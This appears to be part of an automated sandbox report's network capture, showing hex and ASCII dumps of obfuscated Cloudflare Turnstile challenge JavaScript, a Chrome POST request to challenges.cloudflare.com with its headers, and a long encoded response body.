                                                  Data Ascii: g3,g7,ga,gb,gB,gC,gG,gH,g8,g9){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(858))/1+-parseInt(gI(712))/2+-parseInt(gI(1178))/3*(-parseInt(gI(703))/4)+-parseInt(gI(1064))/5+-parseInt(gI(697))/6*(-parseInt(gI(1048))/7)+-parseInt(g
                                                  2024-12-09 08:34:47 UTC1369INData Raw: 72 6e 20 68 3c 69 7d 2c 27 48 47 63 47 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 47 79 45 6a 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 62 74 59 63 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 4f 79 5a 72 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 6c 4b 74 74 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 4b 41 63 69 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 62 4a 54 49 53 27 3a 68 68 28 31 31 39 36 29 2c 27 54 79 59 50 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65
                                                  Data Ascii: rn h<i},'HGcGu':function(h,i){return i&h},'GyEjT':function(h,i){return h-i},'btYcm':function(h,i){return h<i},'OyZrp':function(h,i){return i==h},'lKttJ':function(h,i){return h-i},'KAciu':function(h,i){return h(i)},'bJTIS':hh(1196),'TyYPS':function(h,i){re
                                                  2024-12-09 08:34:47 UTC1369INData Raw: 32 29 5d 28 64 5b 68 6b 28 31 35 32 39 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 68 6b 28 38 36 33 29 5d 28 30 29 2c 78 3d 30 3b 38 3e 78 3b 49 3d 64 5b 68 6b 28 31 36 39 37 29 5d 28 49 2c 31 29 7c 64 5b 68 6b 28 31 31 38 34 29 5d 28 4e 2c 31 29 2c 64 5b 68 6b 28 34 35 32 29 5d 28 4a 2c 64 5b 68 6b 28 35 38 32 29 5d 28 6a 2c 31 29 29 3f 28 4a 3d 30 2c 48 5b 68 6b 28 31 32 33 32 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 20 51 3d 7b 7d 2c 51 5b 68 6b 28 31 36 30 31 29 5d 3d 68 6b 28 31 35 35 37 29 2c 51 5b 68 6b 28 37 39 37 29 5d 3d 48 5b 68 6b 28 31 30 36 31 29 5d 5b 68 6b 28 34 35 39 29 5d 2c 51 5b 68 6b 28 33 35 31 29 5d 3d 68 6b 28 31 35 37 33
                                                  Data Ascii: 2)](d[hk(1529)](o,I)),I=0):J++,x++);for(N=D[hk(863)](0),x=0;8>x;I=d[hk(1697)](I,1)|d[hk(1184)](N,1),d[hk(452)](J,d[hk(582)](j,1))?(J=0,H[hk(1232)](o(I)),I=0):J++,N>>=1,x++);}else Q={},Q[hk(1601)]=hk(1557),Q[hk(797)]=H[hk(1061)][hk(459)],Q[hk(351)]=hk(1573
                                                  2024-12-09 08:34:47 UTC1369INData Raw: 31 29 2c 4a 3d 3d 64 5b 68 6b 28 35 38 32 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 68 6b 28 31 32 33 32 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 45 2d 2d 2c 30 3d 3d 45 26 26 28 45 3d 4d 61 74 68 5b 68 6b 28 31 33 36 33 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 2c 64 65 6c 65 74 65 20 43 5b 44 5d 7d 65 6c 73 65 20 66 6f 72 28 4e 3d 42 5b 44 5d 2c 78 3d 30 3b 64 5b 68 6b 28 39 39 30 29 5d 28 78 2c 47 29 3b 49 3d 64 5b 68 6b 28 34 34 35 29 5d 28 64 5b 68 6b 28 31 32 30 37 29 5d 28 49 2c 31 29 2c 64 5b 68 6b 28 36 32 34 29 5d 28 4e 2c 31 29 29 2c 4a 3d 3d 64 5b 68 6b 28 33 37 37 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 68 6b 28 31 32 33 32 29 5d 28 64 5b 68 6b 28 31 35 32 39 29 5d 28 6f 2c 49 29 29 2c 49 3d
                                                  Data Ascii: 1),J==d[hk(582)](j,1)?(J=0,H[hk(1232)](o(I)),I=0):J++,N>>=1,x++);}E--,0==E&&(E=Math[hk(1363)](2,G),G++),delete C[D]}else for(N=B[D],x=0;d[hk(990)](x,G);I=d[hk(445)](d[hk(1207)](I,1),d[hk(624)](N,1)),J==d[hk(377)](j,1)?(J=0,H[hk(1232)](d[hk(1529)](o,I)),I=
                                                  2024-12-09 08:34:47 UTC1369INData Raw: 4b 3d 6f 2c 4a 3d 73 28 4c 2b 2b 29 29 2c 4d 7c 3d 28 30 3c 51 3f 31 3a 30 29 2a 49 2c 49 3c 3c 3d 31 29 3b 52 3d 65 28 4d 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 27 27 7d 66 6f 72 28 48 3d 43 5b 33 5d 3d 52 2c 47 5b 68 6e 28 31 32 33 32 29 5d 28 52 29 3b 3b 29 69 66 28 64 5b 68 6e 28 34 38 38 29 5d 28 64 5b 68 6e 28 31 33 30 36 29 5d 2c 64 5b 68 6e 28 31 36 31 35 29 5d 29 29 7b 69 66 28 64 5b 68 6e 28 33 31 33 29 5d 28 4c 2c 6a 29 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 4d 3d 30 2c 4e 3d 4d 61 74 68 5b 68 6e 28 31 33 36 33 29 5d 28 32 2c 46 29 2c 49 3d 31 3b 64 5b 68 6e 28 36 36 36 29 5d 28 49 2c 4e 29 3b 51 3d 4b 26 4a 2c 4b 3e 3e 3d 31 2c 4b 3d 3d 30 26 26 28 4b 3d 6f 2c 4a 3d 73 28 4c 2b 2b 29 29 2c 4d 7c 3d 64 5b 68 6e 28 38
                                                  Data Ascii: K=o,J=s(L++)),M|=(0<Q?1:0)*I,I<<=1);R=e(M);break;case 2:return''}for(H=C[3]=R,G[hn(1232)](R);;)if(d[hn(488)](d[hn(1306)],d[hn(1615)])){if(d[hn(313)](L,j))return'';for(M=0,N=Math[hn(1363)](2,F),I=1;d[hn(666)](I,N);Q=K&J,K>>=1,K==0&&(K=o,J=s(L++)),M|=d[hn(8
                                                  2024-12-09 08:34:47 UTC1369INData Raw: 20 6c 2d 6d 7d 7d 2c 6b 2c 68 3d 33 32 2c 6a 3d 65 4d 5b 68 6f 28 31 30 36 31 29 5d 5b 68 6f 28 33 34 36 29 5d 2b 27 5f 27 2b 30 2c 6a 3d 6a 5b 68 6f 28 31 33 35 38 29 5d 28 2f 2e 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 2c 68 70 29 7b 68 70 3d 68 6f 2c 68 5e 3d 6a 5b 68 70 28 38 36 33 29 5d 28 6d 29 7d 29 2c 63 3d 65 4d 5b 68 6f 28 37 30 32 29 5d 28 63 29 2c 69 3d 5b 5d 2c 67 3d 2d 31 3b 21 66 5b 68 6f 28 31 34 39 39 29 5d 28 69 73 4e 61 4e 2c 6b 3d 63 5b 68 6f 28 38 36 33 29 5d 28 2b 2b 67 29 29 3b 69 5b 68 6f 28 31 32 33 32 29 5d 28 53 74 72 69 6e 67 5b 68 6f 28 38 31 39 29 5d 28 66 5b 68 6f 28 38 32 33 29 5d 28 66 5b 68 6f 28 39 32 33 29 5d 28 6b 26 32 35 35 2e 32 39 2c 68 29 2d 67 25 36 35 35 33 35 2b 36 35 35 33 35 2c 32 35 35 29 29 29 29 3b 72
                                                  Data Ascii: l-m}},k,h=32,j=eM[ho(1061)][ho(346)]+'_'+0,j=j[ho(1358)](/./g,function(l,m,hp){hp=ho,h^=j[hp(863)](m)}),c=eM[ho(702)](c),i=[],g=-1;!f[ho(1499)](isNaN,k=c[ho(863)](++g));i[ho(1232)](String[ho(819)](f[ho(823)](f[ho(923)](k&255.29,h)-g%65535+65535,255))));r
                                                  2024-12-09 08:34:47 UTC1369INData Raw: 29 7b 72 65 74 75 72 6e 20 45 2b 46 7d 2c 27 56 70 49 4d 56 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2b 46 7d 7d 29 3b 74 72 79 7b 69 66 28 6a 3d 69 5b 68 44 28 31 31 35 35 29 5d 28 66 33 2c 66 5b 68 44 28 31 34 38 30 29 5d 2c 66 5b 68 44 28 31 34 35 37 29 5d 29 2c 66 5b 68 44 28 31 34 38 30 29 5d 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 3f 66 5b 68 44 28 31 34 38 30 29 5d 3d 4a 53 4f 4e 5b 68 44 28 38 33 39 29 5d 28 66 5b 68 44 28 31 34 38 30 29 5d 2c 4f 62 6a 65 63 74 5b 68 44 28 31 32 34 32 29 5d 28 66 5b 68 44 28 31 34 38 30 29 5d 29 29 3a 69 5b 68 44 28 35 31 35 29 5d 28 69 5b 68 44 28 39 34 37 29 5d 2c 69 5b 68 44 28 39 34 37 29 5d 29 3f 66 5b 68 44 28 31 37 34 37 29 5d 28 67 29 28 68 2e 6a 29 3a 66 5b 68 44 28
                                                  Data Ascii: ){return E+F},'VpIMV':function(E,F){return E+F}});try{if(j=i[hD(1155)](f3,f[hD(1480)],f[hD(1457)]),f[hD(1480)]instanceof Error?f[hD(1480)]=JSON[hD(839)](f[hD(1480)],Object[hD(1242)](f[hD(1480)])):i[hD(515)](i[hD(947)],i[hD(947)])?f[hD(1747)](g)(h.j):f[hD(
                                                  2024-12-09 08:34:47 UTC1369INData Raw: 68 45 28 31 35 34 32 29 5d 2c 64 5b 68 45 28 35 39 35 29 5d 26 26 65 5b 68 45 28 31 31 31 31 29 5d 28 74 79 70 65 6f 66 20 64 5b 68 45 28 35 39 35 29 5d 2c 68 45 28 31 30 34 39 29 29 29 26 26 28 6a 3d 64 5b 68 45 28 35 39 35 29 5d 5b 68 45 28 31 31 32 36 29 5d 28 27 5c 6e 27 29 2c 65 5b 68 45 28 31 35 32 31 29 5d 28 6a 5b 68 45 28 31 31 31 30 29 5d 2c 31 29 29 26 26 28 6b 3d 2f 5e 5c 73 2a 61 74 5c 73 2b 28 2e 2b 29 3a 28 5c 64 2b 29 3a 28 5c 64 2b 29 2f 2c 6c 3d 6a 5b 31 5d 5b 68 45 28 31 35 35 36 29 5d 28 6b 29 2c 6c 26 26 28 67 3d 6c 5b 31 5d 2c 68 3d 70 61 72 73 65 49 6e 74 28 6c 5b 32 5d 2c 31 30 29 2c 69 3d 70 61 72 73 65 49 6e 74 28 6c 5b 33 5d 2c 31 30 29 29 29 3a 66 3d 4a 53 4f 4e 5b 68 45 28 38 33 39 29 5d 28 64 29 3b 72 65 74 75 72 6e 20 6d 3d
                                                  Data Ascii: hE(1542)],d[hE(595)]&&e[hE(1111)](typeof d[hE(595)],hE(1049)))&&(j=d[hE(595)][hE(1126)]('\n'),e[hE(1521)](j[hE(1110)],1))&&(k=/^\s*at\s+(.+):(\d+):(\d+)/,l=j[1][hE(1556)](k),l&&(g=l[1],h=parseInt(l[2],10),i=parseInt(l[3],10))):f=JSON[hE(839)](d);return m=


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  16192.168.2.449763104.18.94.414435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:34:47 UTC1170OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/886786506:1733530621:EAqSDEshVUgRrEF_I8cKkrJx0MsHFLfpUTgE6HdrAZ4/8ef3a85b7bfe0fa7/.jG77cxc1KGWcu2LLqWoWnrRoA1Mo3UMk3KBfzFL0Us-1733733283-1.1.1.1-fnFwjWgIMcbrh.7HH6Feueij1sVE2NIMavS9Nq6meFKwnUnAdcasEk_31SDwzqo4 HTTP/1.1
                                                  Host: challenges.cloudflare.com
                                                  Connection: keep-alive
                                                  Content-Length: 3212
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  Content-type: application/x-www-form-urlencoded
                                                  CF-Chl-RetryAttempt: 0
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  CF-Challenge: .jG77cxc1KGWcu2LLqWoWnrRoA1Mo3UMk3KBfzFL0Us-1733733283-1.1.1.1-fnFwjWgIMcbrh.7HH6Feueij1sVE2NIMavS9Nq6meFKwnUnAdcasEk_31SDwzqo4
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: */*
                                                  Origin: https://challenges.cloudflare.com
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/l1s2c/0x4AAAAAAA0M69ndwcOo8pxI/auto/fbE/normal/auto/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:34:47 UTC3212OUTData Raw: 76 5f 38 65 66 33 61 38 35 62 37 62 66 65 30 66 61 37 3d 66 72 61 56 38 56 4e 56 6e 56 70 56 51 56 6d 45 55 6f 45 55 2d 36 56 53 37 49 44 6c 7a 37 71 78 4d 55 73 42 55 38 75 56 31 32 55 48 56 6c 72 55 54 55 4f 71 42 55 7a 4b 24 56 38 42 55 41 56 7a 39 69 2d 55 4a 71 56 55 7a 70 53 55 4e 25 32 62 2d 55 6c 75 31 2b 44 42 65 56 24 55 68 66 55 4e 30 24 32 75 2d 61 31 41 55 64 56 79 30 55 53 56 6c 30 55 79 77 35 51 32 54 69 2d 65 75 24 55 64 51 72 7a 30 55 73 67 51 52 69 65 31 71 64 59 58 6a 2b 4a 55 55 74 68 31 4f 41 58 31 61 55 4a 57 72 56 56 2b 65 31 31 55 71 42 55 43 43 44 61 4a 44 6e 71 6f 51 5a 55 71 37 63 55 70 43 44 55 71 69 32 61 79 56 51 55 53 44 55 68 56 38 54 55 54 2d 39 4d 43 56 42 47 54 39 2b 42 2d 37 6e 6b 55 71 74 55 43 68 6c 55 70 2d 55 2b 56
                                                  Data Ascii: v_8ef3a85b7bfe0fa7=fraV8VNVnVpVQVmEUoEU-6VS7IDlz7qxMUsBU8uV12UHVlrUTUOqBUzK$V8BUAVz9i-UJqVUzpSUN%2b-Ulu1+DBeV$UhfUN0$2u-a1AUdVy0USVl0Uyw5Q2Ti-eu$UdQrz0UsgQRie1qdYXj+JUUth1OAX1aUJWrVV+e11UqBUCCDaJDnqoQZUq7cUpCDUqi2ayVQUSDUhV8TUT-9MCVBGT9+B-7nkUqtUChlUp-U+V
                                                  2024-12-09 08:34:47 UTC747INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:34:47 GMT
                                                  Content-Type: text/plain; charset=UTF-8
                                                  Content-Length: 149660
                                                  Connection: close
                                                  cf-chl-gen: TxSR4qthnLSxmRaUJE4rD73kacakgQyuegspwzD+Ni/Ofovtduf5hlgUMN2zy46sSFGVW7VKv9E2x5a5439rqI43VqN9Jf3VdkJwxyDOszHw1qzx7E3dgBrherFJNxOfNmhVy5lFwC515Q8XjrDfSiJqqnHV7w88ldWU3kDLpilPzNsozpRvCHdDeNtGsgy79jFobldRZHNqcHlJhv+0G8ONAM2anekIsSjrbT4NwoTwwB1cRTww83ebeD0cMKNJibmL3HfxaXRwF6jXJoEilrouaYjyCl3Al0vJhyvIdsHcB0NIy/JhGusvaCEPHk30g9WF5ZCp4/Qt1W5V6vihE1n6JHoTO3tLS8e4RUHD7q8o15SpuWmnCYIw1WpHLlpJM+9bZL97D2vQY1V0orsz98JJ5yw3QP1bQvDxhVHL915itwa1NlZeMOVzznHmvCQaMlH+VK32FIvQpqm5jG4PHFve4QaamEA2OndoEkyUd47+h78=$ppwpyINDeweSMVqK
                                                  Server: cloudflare
                                                  CF-RAY: 8ef3a87609ae4388-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-12-09 08:34:47 UTC622INData Raw: 6a 6c 6c 32 54 5a 4a 34 5a 70 68 7a 66 5a 4e 77 58 33 43 57 65 49 43 70 59 61 57 41 6e 61 6c 36 71 57 36 74 6f 32 70 76 63 71 61 6a 63 6f 64 79 69 70 4b 79 70 36 75 57 6a 4a 43 73 70 62 47 39 6f 5a 2f 48 77 35 33 47 77 49 32 68 30 4b 72 42 79 62 57 6f 72 36 7a 42 31 70 58 52 6d 62 43 35 6d 72 72 50 6e 36 37 64 33 4e 47 32 32 4d 62 5a 75 63 65 32 34 4c 2b 35 70 4d 79 74 35 66 62 4a 79 66 6e 30 2b 63 33 39 2b 41 44 56 38 65 79 39 32 76 62 44 43 63 48 6a 78 2b 62 5a 31 38 33 6b 33 78 50 53 7a 78 41 42 37 2b 63 4e 44 41 58 5a 38 2b 67 4a 33 66 59 55 37 74 72 39 35 65 51 54 38 42 37 7a 43 77 58 33 36 77 41 6c 38 42 4d 6f 44 67 2f 77 38 41 55 4d 38 51 38 4a 4c 52 4d 59 44 42 73 54 41 52 49 31 49 7a 55 38 42 52 52 49 4a 67 35 4a 48 6a 4a 48 50 6a 4d 64 4e 55 59
                                                  Data Ascii: jll2TZJ4ZphzfZNwX3CWeICpYaWAnal6qW6to2pvcqajcodyipKyp6uWjJCspbG9oZ/Hw53GwI2h0KrBybWor6zB1pXRmbC5mrrPn67d3NG22MbZuce24L+5pMyt5fbJyfn0+c39+ADV8ey92vbDCcHjx+bZ183k3xPSzxAB7+cNDAXZ8+gJ3fYU7tr95eQT8B7zCwX36wAl8BMoDg/w8AUM8Q8JLRMYDBsTARI1IzU8BRRIJg5JHjJHPjMdNUY
                                                  2024-12-09 08:34:47 UTC1369INData Raw: 39 4e 54 44 67 72 61 6a 78 50 52 57 35 56 55 58 56 52 59 32 55 79 57 33 39 72 53 33 34 35 51 6e 31 57 52 48 4a 2f 61 47 42 59 59 34 78 34 54 47 2b 4f 55 57 47 51 6a 6c 4a 76 6c 49 69 61 68 47 75 46 64 59 70 72 57 58 35 56 66 6f 35 6d 58 5a 4a 34 71 57 69 6f 6c 32 56 73 61 61 32 45 68 6e 4f 6c 73 37 4b 5a 6c 37 5a 33 6c 59 6c 35 76 62 69 4b 6f 58 57 7a 67 5a 65 2b 69 4d 71 48 70 5a 6e 4e 6e 73 4b 6a 76 72 71 64 6f 61 54 4b 71 62 53 78 30 62 6d 6f 79 4d 37 4e 72 4e 2b 76 6e 37 4b 2f 6e 4f 53 68 36 4b 6e 5a 37 4b 65 35 75 4b 76 51 76 4e 48 53 77 75 54 51 38 4f 54 6d 7a 39 75 39 32 2b 66 66 37 4f 33 58 34 38 58 69 78 4f 66 30 39 41 62 72 7a 66 73 49 37 2f 7a 78 2f 66 50 56 42 4f 6e 33 42 66 6a 61 2b 39 30 50 38 51 41 4e 42 42 34 45 35 52 62 35 43 42 55 4c 44
                                                  Data Ascii: 9NTDgrajxPRW5VUXVRY2UyW39rS345Qn1WRHJ/aGBYY4x4TG+OUWGQjlJvlIiahGuFdYprWX5Vfo5mXZJ4qWiol2Vsaa2EhnOls7KZl7Z3lYl5vbiKoXWzgZe+iMqHpZnNnsKjvrqdoaTKqbSx0bmoyM7NrN+vn7K/nOSh6KnZ7Ke5uKvQvNHSwuTQ8OTmz9u92+ff7O3X48XixOf09AbrzfsI7/zx/fPVBOn3Bfja+90P8QANBB4E5Rb5CBULD
                                                  2024-12-09 08:34:47 UTC1369INData Raw: 41 4b 32 56 48 58 32 6f 76 4d 7a 4d 34 5a 6b 39 49 57 56 77 2f 50 45 46 67 57 45 52 41 5a 45 64 46 58 6d 68 67 54 57 6c 73 54 30 31 38 63 47 68 56 68 47 68 6a 65 34 35 54 6d 35 39 62 67 48 78 69 57 71 4a 63 66 35 57 5a 66 34 65 73 61 49 6d 67 62 58 75 6d 6e 37 57 56 69 4a 52 31 71 61 65 54 75 33 69 79 6c 6e 79 4c 66 61 76 45 70 62 43 32 68 4c 6e 4a 69 73 71 49 68 4c 65 37 6b 61 47 78 7a 38 79 69 6b 73 4c 4e 70 36 50 5a 75 74 50 4c 79 70 2b 69 6f 4b 47 75 32 73 2f 47 33 63 43 2b 78 39 58 4e 78 75 54 71 7a 38 71 39 79 74 4c 54 75 4c 62 4b 34 2b 61 7a 39 72 67 43 36 76 33 37 2f 50 76 6b 39 2f 6f 47 33 65 72 59 33 75 7a 4f 36 50 6b 47 39 4f 34 43 41 74 4c 4b 44 64 54 6f 36 76 55 49 38 39 7a 67 44 41 54 74 33 78 48 67 34 41 6b 55 2b 67 59 70 46 2b 6e 73 48 52
                                                  Data Ascii: AK2VHX2ovMzM4Zk9IWVw/PEFgWERAZEdFXmhgTWlsT018cGhVhGhje45Tm59bgHxiWqJcf5WZf4esaImgbXumn7WViJR1qaeTu3iylnyLfavEpbC2hLnJisqIhLe7kaGxz8yiksLNp6PZutPLyp+ioKGu2s/G3cC+x9XNxuTqz8q9ytLTuLbK4+az9rgC6v37/Pvk9/oG3erY3uzO6PkG9O4CAtLKDdTo6vUI89zgDATt3xHg4AkU+gYpF+nsHR
                                                  2024-12-09 08:34:47 UTC1369INData Raw: 57 6c 4e 4b 52 58 4a 73 64 45 35 39 62 54 70 51 55 32 39 41 55 56 74 6e 57 31 70 45 65 30 39 65 61 57 64 47 6c 56 2b 48 59 5a 65 44 62 48 42 6e 63 35 6d 64 61 56 78 76 6a 33 2b 64 6e 5a 42 67 67 48 68 6d 6d 35 75 61 6d 59 57 6f 6f 4b 2b 52 63 4c 5a 79 6d 6e 4b 49 73 4b 69 4b 77 4a 4f 58 71 36 36 43 64 34 4f 50 74 59 53 54 78 73 48 4f 6c 38 54 4a 30 4a 4c 45 79 4e 50 51 71 4a 62 58 7a 35 66 53 31 4a 37 49 76 4a 76 62 34 4a 72 63 70 62 4b 6b 78 75 72 46 74 4f 50 4a 79 74 33 4d 30 4b 2b 30 34 50 54 6e 73 76 58 70 74 75 7a 6c 31 2f 6e 4f 75 50 72 57 76 75 41 42 2b 66 41 44 42 4e 76 72 36 63 62 6d 33 41 4d 48 42 76 44 78 34 76 50 6f 39 51 6e 57 42 65 2f 30 2f 66 59 56 47 50 67 66 4a 79 49 45 4a 66 54 63 47 79 67 76 37 50 63 73 2f 44 41 6f 38 77 73 68 44 53 51
                                                  Data Ascii: WlNKRXJsdE59bTpQU29AUVtnW1pEe09eaWdGlV+HYZeDbHBnc5mdaVxvj3+dnZBggHhmm5uamYWooK+RcLZymnKIsKiKwJOXq66Cd4OPtYSTxsHOl8TJ0JLEyNPQqJbXz5fS1J7IvJvb4JrcpbKkxurFtOPJyt3M0K+04PTnsvXptuzl1/nOuPrWvuAB+fADBNvr6cbm3AMHBvDx4vPo9QnWBe/0/fYVGPgfJyIEJfTcGygv7Pcs/DAo8wshDSQ
                                                  2024-12-09 08:34:47 UTC1369INData Raw: 54 74 64 61 33 70 57 65 6e 30 36 5a 33 78 62 50 6e 56 2f 53 34 64 52 68 6f 4b 4a 62 34 68 30 6d 59 35 73 62 6d 6d 53 69 33 78 77 61 31 39 36 6d 5a 43 46 62 32 43 54 58 48 39 72 65 4b 35 38 61 33 79 65 6b 35 79 43 6e 71 75 4d 6a 33 61 5a 76 4a 32 52 6b 70 36 58 77 62 32 62 75 34 4b 78 6f 4b 47 66 79 70 76 4b 75 73 79 43 79 36 37 51 73 62 4b 7a 6b 4d 65 54 75 61 6e 4c 76 4c 6e 54 72 62 53 39 76 36 4b 32 74 4f 58 42 78 61 4b 64 79 39 2b 71 72 36 37 49 75 2b 48 51 77 62 62 50 35 64 43 36 77 39 6a 46 78 2b 33 66 75 4d 76 77 33 39 79 34 33 39 44 5a 77 4d 6a 47 41 65 37 4e 34 4d 6e 4e 33 51 33 71 79 42 62 6b 41 78 77 48 36 65 67 63 30 52 33 5a 48 66 6a 62 48 52 6f 44 35 69 41 58 42 41 48 31 35 4f 55 4d 45 79 63 48 43 44 4d 4e 38 50 45 59 44 54 4d 71 42 7a 72 36
                                                  Data Ascii: Ttda3pWen06Z3xbPnV/S4dRhoKJb4h0mY5sbmmSi3xwa196mZCFb2CTXH9reK58a3yek5yCnquMj3aZvJ2Rkp6Xwb2bu4KxoKGfypvKusyCy67QsbKzkMeTuanLvLnTrbS9v6K2tOXBxaKdy9+qr67Iu+HQwbbP5dC6w9jFx+3fuMvw39y439DZwMjGAe7N4MnN3Q3qyBbkAxwH6egc0R3ZHfjbHRoD5iAXBAH15OUMEycHCDMN8PEYDTMqBzr6
                                                  2024-12-09 08:34:47 UTC1369INData Raw: 64 68 52 33 68 62 61 59 68 73 68 58 2b 4f 65 6f 46 69 69 34 78 73 64 70 5a 58 6b 47 74 73 5a 6c 6c 33 66 47 42 56 67 61 4b 61 63 70 43 65 6d 36 4b 4b 68 35 35 73 68 6d 75 69 62 71 79 49 72 6e 39 71 70 62 47 31 65 58 57 4f 6b 61 75 61 6a 36 4a 2b 73 49 36 78 77 37 54 4a 75 37 57 62 7a 49 36 65 68 38 37 4b 78 61 54 52 71 36 50 53 79 5a 47 6f 75 74 47 77 76 4b 43 66 73 74 6e 47 6e 36 66 44 32 4b 6e 6d 35 39 72 66 77 4e 6e 63 38 64 2b 73 72 2f 58 33 75 4d 48 54 37 2f 72 61 2f 4d 76 74 41 2f 72 64 2b 4d 50 6c 33 41 66 41 33 76 62 4c 36 73 30 44 2b 52 4c 53 79 51 34 50 31 68 62 72 38 75 4d 61 37 4f 76 65 30 52 49 64 43 77 30 65 39 65 4d 4a 46 69 73 54 46 52 38 74 47 2f 37 35 2f 52 49 7a 4c 53 55 55 39 79 30 51 4c 78 45 36 44 54 63 4a 4e 68 63 6a 49 7a 6b 4f 47
                                                  Data Ascii: dhR3hbaYhshX+OeoFii4xsdpZXkGtsZll3fGBVgaKacpCem6KKh55shmuibqyIrn9qpbG1eXWOkauaj6J+sI6xw7TJu7WbzI6eh87KxaTRq6PSyZGoutGwvKCfstnGn6fD2Knm59rfwNnc8d+sr/X3uMHT7/ra/MvtA/rd+MPl3AfA3vbL6s0D+RLSyQ4P1hbr8uMa7Ove0RIdCw0e9eMJFisTFR8tG/75/RIzLSUU9y0QLxE6DTcJNhcjIzkOG
                                                  2024-12-09 08:34:47 UTC1369INData Raw: 75 57 48 75 4f 5a 59 79 45 58 6c 4e 79 6a 32 6d 43 69 6f 65 56 58 57 71 55 6f 47 47 67 62 32 35 67 5a 4a 4b 66 59 59 69 65 66 33 78 38 72 34 43 43 68 58 32 47 67 33 43 50 6c 6f 71 30 6a 61 6d 63 6e 4c 75 32 6f 72 65 53 78 49 61 31 79 4d 61 55 6f 34 65 6a 6f 4d 36 36 72 35 2f 53 30 70 4f 6c 78 73 4c 42 7a 4a 6d 36 31 61 65 30 76 71 2f 52 72 61 54 41 77 62 7a 41 31 4d 6a 70 6e 73 4c 64 74 38 44 44 76 63 76 51 78 36 6a 45 7a 37 47 35 2b 4d 2f 63 75 37 48 35 2b 73 7a 5a 37 73 2f 44 42 75 6b 48 39 75 76 73 43 39 7a 36 34 2f 45 4b 41 67 41 4d 30 65 44 6c 2b 4f 6e 73 45 4e 6a 65 44 39 73 44 34 66 37 37 2b 52 44 38 38 77 50 69 4a 78 62 72 36 43 77 41 45 44 51 56 4a 77 38 78 47 50 49 4a 4e 52 41 49 38 79 77 41 47 54 63 79 51 6a 4d 7a 46 67 54 36 47 53 7a 39 48 51
                                                  Data Ascii: uWHuOZYyEXlNyj2mCioeVXWqUoGGgb25gZJKfYYief3x8r4CChX2Gg3CPloq0jamcnLu2oreSxIa1yMaUo4ejoM66r5/S0pOlxsLBzJm61ae0vq/RraTAwbzA1MjpnsLdt8DDvcvQx6jEz7G5+M/cu7H5+szZ7s/DBukH9uvsC9z64/EKAgAM0eDl+OnsENjeD9sD4f77+RD88wPiJxbr6CwAEDQVJw8xGPIJNRAI8ywAGTcyQjMzFgT6GSz9HQ
                                                  2024-12-09 08:34:47 UTC1369INData Raw: 69 6c 4e 58 56 58 53 43 57 6f 39 32 68 70 4e 61 6d 6c 78 34 70 58 53 57 5a 57 61 70 64 46 32 66 72 49 69 68 5a 34 53 4a 67 49 57 71 63 33 64 31 6b 71 4a 36 72 35 61 6d 73 33 71 36 66 4a 66 46 6c 4c 61 46 68 73 65 55 66 62 2f 4d 71 4d 47 48 70 4b 6d 65 71 63 71 54 6c 35 57 77 77 70 72 50 74 73 62 54 6d 74 71 63 75 74 32 30 31 71 57 6d 35 62 53 64 33 2b 7a 49 34 39 7a 50 79 4c 4c 42 34 39 62 41 35 66 44 69 35 72 72 62 41 4d 7a 4e 39 4c 32 35 33 73 54 33 43 64 7a 39 35 74 37 6a 44 66 62 73 34 65 37 4a 45 75 34 53 44 42 62 76 39 78 44 57 38 4f 59 4c 2f 66 45 56 33 53 4d 56 48 67 51 70 47 42 38 42 2b 52 67 68 42 42 44 76 4d 77 51 6d 38 54 66 31 46 69 77 55 47 43 63 52 43 76 